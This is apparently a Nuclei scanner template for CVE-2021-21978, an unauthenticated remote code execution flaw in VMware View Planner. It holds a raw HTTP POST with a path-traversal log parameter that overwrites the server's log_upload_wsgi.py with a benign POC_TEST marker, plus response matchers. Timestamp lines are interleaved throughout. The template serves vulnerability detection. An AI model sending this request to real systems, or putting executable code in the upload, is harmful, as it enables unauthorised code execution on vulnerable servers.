2021-03-05 08:27:05 +00:00
id : CVE-2021-21978
info :
name : VMware View Planner Unauthenticated RCE
author : dwisiswant0
severity : critical
reference : https://twitter.com/osama_hroot/status/1367258907601698816
description : |
This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability.
Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
file leading to remote code execution within the logupload container.
tags : cve,cve2021,vmware,rce
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2021-21978
cwe-id : CWE-434
2021-03-05 08:27:05 +00:00
requests :
- raw :
- |
POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
Accept : text/html
Referer : {{BaseURL}}
Connection : close
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition : form-data; name="logfile"; filename=""
Content-Type : text/plain
POC_TEST
------WebKitFormBoundarySHHbUsfCoxlX1bpS
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "File uploaded successfully."
part : body
- type : dsl
dsl :
2021-03-10 11:49:34 +00:00
- "len(body) == 28" # length of "\nFile uploaded successfully."